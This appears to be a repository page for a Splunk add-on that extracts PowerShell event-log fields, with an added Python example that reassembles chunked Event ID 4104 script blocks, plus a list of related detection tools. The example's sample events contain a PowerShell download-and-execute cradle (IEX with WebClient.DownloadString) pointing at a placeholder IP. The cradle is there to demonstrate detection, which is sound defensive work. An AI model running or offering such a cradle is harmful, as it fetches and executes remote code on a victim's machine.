Splunk Add-on for PowerShell provides field extraction for PowerShell event logs.
☆17 · Feb 1, 2021 · Updated 5 years ago
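The one-line description above names the job the add-on does: turn PowerShell event-log text into searchable fields. As an added example (not code from the add-on, which does this with Splunk props.conf/transforms.conf), the Python below performs the same extraction offline for Event ID 4104 (script block logging) and adds the step a Splunk search cannot do per event: reassembling multi-chunk script blocks. The sample events are constructed here in the key=value shape Splunk's WinEventLog input renders (an assumption about layout; only the fields used are included), and the host name, paths and ScriptBlock IDs are made up.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry), laid out the way Splunk's
# WinEventLog input renders Microsoft-Windows-PowerShell/Operational events as
# key=value text. Assumption: real events carry more fields than shown. Host,
# paths and ScriptBlock IDs are invented. Windows chunks long script blocks at
# arbitrary offsets, so the first block is deliberately cut inside the token
# "DownloadString": no single event contains it, only the reassembled block.
SAMPLE_EVENTS = [
    r"""02/01/2021 10:15:01 AM
EventCode=4104
ComputerName=WS01.corp.example
Message=Creating Scriptblock text (1 of 2):
$c = New-Object System.Net.WebClient; IEX $c.Download

ScriptBlock ID: 3f2c9d1a-0b7e-4d8a-9c21-6e5f4a3b2c10
Path: C:\Users\alice\Downloads\run.ps1""",
    r"""02/01/2021 10:15:01 AM
EventCode=4104
ComputerName=WS01.corp.example
Message=Creating Scriptblock text (2 of 2):
String('http://198.51.100.7/p.ps1')

ScriptBlock ID: 3f2c9d1a-0b7e-4d8a-9c21-6e5f4a3b2c10
Path: C:\Users\alice\Downloads\run.ps1""",
    r"""02/01/2021 10:16:44 AM
EventCode=4104
ComputerName=WS01.corp.example
Message=Creating Scriptblock text (1 of 1):
Get-Process | Where-Object CPU -gt 100

ScriptBlock ID: 8a1b2c3d-4e5f-4a6b-8c7d-9e0f1a2b3c4d
Path: """,
    r"""02/01/2021 10:17:09 AM
EventCode=4104
ComputerName=WS01.corp.example
Message=Creating Scriptblock text (2 of 3):
Write-Output 'middle chunk only'

ScriptBlock ID: c0ffee00-1111-4222-8333-444455556666
Path: C:\tmp\partial.ps1""",
]

KV_RE = re.compile(r"^(\w+)=(.*)$")
# 4104 message body: chunk header, script text, blank line, ID and Path trailer.
SB_RE = re.compile(
    r"Creating Scriptblock text \((\d+) of (\d+)\):\n(.*?)\n\nScriptBlock ID: (\S+)\nPath: (.*)",
    re.DOTALL,
)


def extract_fields(event: str) -> dict:
    """Split one rendered event into fields. Message is multi-line, so everything
    after the first 'Message=' is the message; 4104 fields are parsed from it."""
    fields = {}
    head, sep, message = event.partition("\nMessage=")
    for line in head.splitlines():
        m = KV_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    if sep:
        fields["Message"] = message
        m = SB_RE.match(message)
        if m:
            fields["MessageNumber"] = int(m.group(1))
            fields["MessageTotal"] = int(m.group(2))
            fields["ScriptBlockText"] = m.group(3)
            fields["ScriptBlockId"] = m.group(4)
            fields["Path"] = m.group(5).strip()  # empty for interactive input
    return fields


def reassemble_scriptblocks(events) -> dict:
    """Group 4104 chunks by ScriptBlockId and join them in MessageNumber order.
    Chunks are concatenated with no separator because split points are not
    token boundaries; a block is complete only if chunks 1..MessageTotal exist."""
    parts = defaultdict(dict)
    meta = {}
    for ev in events:
        f = extract_fields(ev)
        if f.get("EventCode") != "4104" or "ScriptBlockId" not in f:
            continue
        parts[f["ScriptBlockId"]][f["MessageNumber"]] = f["ScriptBlockText"]
        meta[f["ScriptBlockId"]] = (f["MessageTotal"], f["Path"])
    blocks = {}
    for sbid, chunks in parts.items():
        total, path = meta[sbid]
        blocks[sbid] = {
            "text": "".join(chunks[i] for i in sorted(chunks)),
            "path": path,
            "complete": set(chunks) == set(range(1, total + 1)),
        }
    return blocks


def matching_blocks(blocks: dict, needle: str) -> list:
    """IDs of reassembled blocks whose full text contains needle."""
    return sorted(sbid for sbid, b in blocks.items() if needle in b["text"])


if __name__ == "__main__":
    blocks = reassemble_scriptblocks(SAMPLE_EVENTS)
    for sbid, b in blocks.items():
        print(sbid, "complete" if b["complete"] else "PARTIAL", repr(b["path"]), b["text"])
    print("DownloadString found in:", matching_blocks(blocks, "DownloadString"))
```

The practical point is the last print: a search for `DownloadString` over raw 4104 events misses the first block entirely, because the token straddles two chunks; only the reassembled text matches. Per-event field extraction (what the add-on provides) is the prerequisite, and `MessageNumber`/`MessageTotal`/`ScriptBlockId` are the fields that make the reassembly possible in a later search or pipeline.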
Alternatives and similar repositories for splunk-addon-powershell
Users interested in splunk-addon-powershell are comparing it to the repositories listed below.
- Guardicore osqueries collection for asset information, TH and compliance. ☆16 · Dec 22, 2021 · Updated 4 years ago
- CeramicSkate0 Sysmon configuration fork file template with default high-quality event tracing ☆10 · Sep 29, 2023 · Updated 2 years ago
- Atomic Red Team Simple Parser ☆13 · Sep 21, 2018 · Updated 7 years ago
- Custom Splunk search command to reconstruct a pstree from Sysmon process creation events (EventCode 1) ☆24 · Mar 3, 2023 · Updated 2 years ago
- my MSTICpy practice and custom tools repository ☆11 · Apr 23, 2025 · Updated 10 months ago
- Converts Sigma detection rules to a Splunk alert configuration. ☆12 · Jul 1, 2021 · Updated 4 years ago
- Check Sigma rules for easy-to-bypass whitelists to make them more robust (https://github.com/SigmaHQ/sigma) ☆15 · Feb 1, 2021 · Updated 5 years ago
- Windows stuff ☆16 · Feb 5, 2020 · Updated 6 years ago
- Validates Sigma rules using the JSON schema ☆22 · Mar 18, 2024 · Updated last year
- Open-source Fabric templates for cybersecurity and compliance ☆31 · Jan 13, 2025 · Updated last year
- Cyber Threat Intelligence ☆77 · Dec 7, 2025 · Updated 2 months ago
- Adversarial Interception Mission Oriented Discovery and Disruption Framework, or AIMOD2, is a structured threat hunting approach to proac… ☆90 · Sep 16, 2023 · Updated 2 years ago
- A Splunk app to use MISP in background ☆113 · Jan 8, 2026 · Updated last month
- AWS EKS Cluster Forensics ☆23 · Aug 16, 2021 · Updated 4 years ago
- Collects a listing of MITRE ATT&CK Techniques, then discovers Splunk ESCU detections for each technique ☆69 · Mar 17, 2024 · Updated last year
- MITRE ATT&CK Framework compliance dashboard and correlation searches that work with Splunk Enterprise Security and ES Content Update ☆30 · Nov 7, 2025 · Updated 3 months ago
- A cyber threat intelligence chatbot that ingested 2200+ reports from vx-underground. ☆33 · Apr 1, 2024 · Updated last year
- Simple Windows Event Log Forwarder (SWELF). It's an easy to use/simply works Log Forwarder and EVTX Parser. Almost in full release here at ht… ☆24 · Jun 20, 2023 · Updated 2 years ago
- A C# tool for enumerating remote access policies through group policy. ☆73 · Apr 18, 2019 · Updated 6 years ago
- PowerSponse is a PowerShell module focused on targeted containment and remediation during incident response. ☆40 · Mar 18, 2022 · Updated 3 years ago
- Automated memory forensics analysis ☆32 · Aug 20, 2019 · Updated 6 years ago
- Some IR notes ☆73 · Jul 23, 2016 · Updated 9 years ago
- A rewrite of mactime, a bodyfile reader ☆39 · Aug 5, 2024 · Updated last year
- POC code to explore phishing attacks using OAuth 2.0 authorization flows, such as the device authorization grant. ☆35 · Aug 7, 2021 · Updated 4 years ago
- Trace ScriptBlock execution for powershell v2 ☆40 · Jan 14, 2020 · Updated 6 years ago
- SIEGMA - Transform Sigma rules into SIEM consumables ☆159 · Mar 10, 2025 · Updated 11 months ago
- Splunk app to monitor the /etc directory of Splunk for all changes of .conf files ☆13 · Jan 26, 2018 · Updated 8 years ago
- A small crappy script I wrote that converts the Sigma Windows Process Creation events to KQL via PySigma. Designed for CI/CD ☆10 · Nov 7, 2023 · Updated 2 years ago
- The Advanced Vulnerability Information Sharing Environment -- A Platform for CVD and PSIRT Management ☆10 · Jan 30, 2024 · Updated 2 years ago
- QRadar AQL backend for converting Sigma rules to QRadar AQL queries ☆14 · Sep 18, 2025 · Updated 5 months ago
- Generate GSM authentication triplets (as per 3GPP TS 55.205) ☆16 · Jan 11, 2018 · Updated 8 years ago
- KQL queries for Microsoft Defender Advanced Hunting organized around the TTPs of the MITRE ATT&CK framework. ☆18 · Nov 7, 2024 · Updated last year
- A repository of my own Sigma detection rules. ☆163 · Nov 25, 2025 · Updated 3 months ago